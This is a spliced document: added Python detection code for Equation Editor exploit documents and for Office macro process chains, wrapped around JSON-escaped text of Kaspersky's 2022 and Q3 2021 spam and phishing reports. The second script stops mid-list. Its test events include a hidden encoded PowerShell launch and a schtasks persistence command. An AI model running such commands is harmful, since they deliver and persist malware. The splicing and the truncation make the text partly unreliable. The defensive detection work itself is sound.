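The Equation Editor exploits ranked above (CVE-2018-0802 fourth, CVE-2017-11882 tenth) reach the victim as an OLE object embedded in an RTF or Office attachment. The scanner below is an added example, not code from this report or from Kaspersky. It pulls every `\objdata` blob out of an RTF, parses the OLE 1.0 object header for the class name, and flags the object if the normalised class name starts with "Equation", if the embedded compound file carries the Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046}, or if it names an "Equation Native" stream. The sample documents it builds are constructed for the demo and contain no exploit, only those markers; the mangled class name `EqUaTion.3` is an assumption standing in for the obfuscation that RTF builders apply to the class string.

```python
"""Flag RTF attachments that embed a Microsoft Equation Editor object.

Added example (not code from the Kaspersky report). It relies on three
documented facts: RTF stores embedded OLE objects as hex in \\objdata
groups; that hex decodes to an OLE 1.0 ObjectHeader carrying the class
name (MS-OLEDS); and Equation Editor 3.0 objects use CLSID
{0002CE02-0000-0000-C000-000000000046} and keep their MTEF data in a
compound-file stream named "Equation Native".
"""
from __future__ import annotations
import re
import struct

# CLSID as it appears on disk: Data1..Data3 little-endian, Data4 as-is.
EQNEDT_CLSID = bytes.fromhex("02CE02000000000000C000000000000046")
# Compound-file directory entries hold stream names as UTF-16LE.
EQN_NATIVE_UTF16 = "Equation Native".encode("utf-16-le")


def extract_objdata(rtf: bytes) -> list[bytes]:
    """Decode every \\objdata group into raw bytes (whitespace and junk stripped)."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b([^}]*)", rtf):
        hexdata = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a stray trailing nibble
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def parse_ole1(blob: bytes) -> dict | None:
    """Parse the OLE 1.0 ObjectHeader that precedes the native (OLE2) data."""
    def lp_string(off: int) -> tuple[bytes, int]:
        (n,) = struct.unpack_from("<I", blob, off)
        return blob[off + 4: off + 4 + n].rstrip(b"\x00"), off + 4 + n
    try:
        version, fmt = struct.unpack_from("<II", blob, 0)
        class_name, off = lp_string(8)
        _topic, off = lp_string(off)
        _item, off = lp_string(off)
        native = b""
        if fmt == 2:  # FormatID 2 = EmbeddedObject: NativeDataSize then NativeData
            (size,) = struct.unpack_from("<I", blob, off)
            native = blob[off + 4: off + 4 + size]
    except struct.error:
        return None
    return {"version": version, "class_name": class_name.decode("latin-1"), "native": native}


def scan_rtf(rtf: bytes) -> list[dict]:
    """Return one finding per embedded object that looks like Equation Editor."""
    findings = []
    for blob in extract_objdata(rtf):
        hdr = parse_ole1(blob)
        if hdr is None:
            continue
        reasons = []
        # Builders mangle the class string (odd case, junk characters), so normalise first.
        if re.sub(r"[^a-z0-9]", "", hdr["class_name"].lower()).startswith("equation"):
            reasons.append(f"OLE1 class name {hdr['class_name']!r}")
        if EQNEDT_CLSID in hdr["native"]:
            reasons.append("Equation Editor 3.0 CLSID in embedded compound file")
        if EQN_NATIVE_UTF16 in hdr["native"]:
            reasons.append("'Equation Native' stream in embedded compound file")
        if reasons:
            findings.append({"class_name": hdr["class_name"], "reasons": reasons})
    return findings


# --- constructed sample documents (no exploit payload, markers only) -------
def _lp(s: bytes) -> bytes:
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def build_sample_rtf(class_name: bytes, native: bytes) -> bytes:
    """Wrap fake native data in an OLE 1.0 header and an RTF \\object group."""
    header = struct.pack("<II", 0x00000501, 2) + _lp(class_name) + struct.pack("<II", 0, 0)
    blob = header + struct.pack("<I", len(native)) + native
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass " + class_name
            + b"}{\\*\\objdata " + blob.hex().encode() + b"}}\\par}")


CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SAMPLE_EQN_NATIVE = CFB_MAGIC + b"\x00" * 8 + EQN_NATIVE_UTF16 + b"\x00" * 8 + EQNEDT_CLSID
SAMPLE_WORD_NATIVE = CFB_MAGIC + b"\x00" * 8 + "WordDocument".encode("utf-16-le")
SAMPLE_MALICIOUS_RTF = build_sample_rtf(b"EqUaTion.3", SAMPLE_EQN_NATIVE)  # mangled name is assumed
SAMPLE_BENIGN_RTF = build_sample_rtf(b"Word.Document.8", SAMPLE_WORD_NATIVE)

if __name__ == "__main__":
    for label, doc in (("equation-object", SAMPLE_MALICIOUS_RTF), ("benign", SAMPLE_BENIGN_RTF)):
        print(label, scan_rtf(doc))
```

A hit is a triage signal, not a verdict: a genuine formula in a legitimate document matches too, so the sensible action is "detonate or strip the object", not "block sender". The `[^}]*` capture handles plain hex with whitespace; documents that interleave control words or nested groups inside `\objdata` need a real RTF tokenizer in its place.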
As in 2021, attackers mostly distributed the same samples from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remained the leader in terms of blocked malicious attachments in 2022 (8.78%), a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices in Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar (12.04%), seventh in 2021, is in third place. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. 
Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone, whose share also decreased, remained in second place (8.79%). The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places with each other relative to 2021, again occupying fourth and fifth. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. 
The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services accounted for the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, and almost as many phishing resources targeted users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. 
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nNotably, the majority of these phishing attacks were aimed at users in Russia. In the first months of 2022 their share was roughly half of all attacks worldwide; from March onward, 70\u201390% of all attempts by Telegram users to follow phishing links came from Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp was down slightly compared to 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. 
The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place: over the year, the Safe Messaging component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike on WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks reached more than 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. 
Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we have seen an increase in targeted phishing attacks in which scammers do not send the phishing message straight away, but only after several introductory emails in which they build up an active correspondence with the victim. This trend is likely to continue. 
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. 
Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixtures. 
The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. 
Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. 
Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured victims that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, session tokens that let you avoid having to re-enter your credentials on frequently used sites, and which therefore let whoever holds them act as you.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. This quarter saw a new threat of this kind: fraudulent welfare payment apps that could be downloaded from one such platform. 
The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the app listing, as well as the design mimicking real government sites, added credibility. We informed the store in question, which removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. 
In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. 
The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. 
and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. 
Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
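The families in the two rankings above and in the SAgent attachment described earlier (a macro that launches PowerShell to fetch the next stage) share behaviour that is visible in process-creation telemetry, which is where mail-borne attachments are most often caught once they get past the gateway. The rules below are an added example, not Kaspersky code, run over constructed events in the shape of Sysmon Event ID 1 records (field names follow Sysmon; the paths, times and command lines are invented for the demo). Two points the rules build in: EQNEDT32.EXE is started by DCOM, so its parent is svchost.exe rather than the Office process, and the exploit tell for CVE-2017-11882 / CVE-2018-0802 is therefore a child of eqnedt32.exe, not eqnedt32.exe itself; and that Taskun registers its scheduled task through schtasks.exe is an assumption made for the example, since the report only says the family creates tasks.

```python
"""Process-tree rules for mail-borne attachments: Office macro -> script host,
Office -> schtasks, and any child of EQNEDT32.EXE.

Added example, not Kaspersky code. SAMPLE_EVENTS are constructed in the shape
of Sysmon Event ID 1 (process creation) records; the paths, times and command
lines are invented for the demo.
"""
from __future__ import annotations
import json
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return PureWindowsPath(path).name.lower()


def rule_office_script_host(parent: str, child: str, cmdline: str) -> bool:
    # SAgent-style macro: an Office process launching PowerShell or another script host.
    return parent in OFFICE_APPS and child in SCRIPT_HOSTS


def rule_office_schtasks(parent: str, child: str, cmdline: str) -> bool:
    # Scheduled-task persistence from an Office process. That Taskun uses schtasks.exe
    # rather than the Task Scheduler COM API is an assumption for this example.
    return parent in OFFICE_APPS and child == "schtasks.exe" and "/create" in cmdline.lower()


def rule_eqnedt32_child(parent: str, child: str, cmdline: str) -> bool:
    # Equation Editor is started by DCOM (parent svchost.exe) and has no reason to
    # spawn anything; a child of eqnedt32.exe is the CVE-2017-11882 / CVE-2018-0802 tell.
    return parent == "eqnedt32.exe"


RULES = {
    "office_spawns_script_host": rule_office_script_host,
    "office_registers_scheduled_task": rule_office_schtasks,
    "eqnedt32_spawns_child": rule_eqnedt32_child,
}


def evaluate(event: dict) -> list[str]:
    """Names of the rules a single Sysmon-ID-1-shaped event satisfies."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    return [name for name, rule in RULES.items() if rule(parent, child, cmdline)]


def scan(jsonl: str) -> list[tuple[str, str, list[str]]]:
    """Run the rules over JSON-lines events; return (UtcTime, child image, rules) per hit."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        matched = evaluate(event)
        if matched:
            hits.append((event["UtcTime"], image_name(event["Image"]), matched))
    return hits


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: three events should fire, three are benign context.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2022-03-01 09:12:03", "ParentImage": WINWORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"UtcTime": "2022-03-01 09:12:05", "ParentImage": WINWORD,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /SC MINUTE /MO 10 /TN Updater /TR "C:\Users\Public\u.exe"'},
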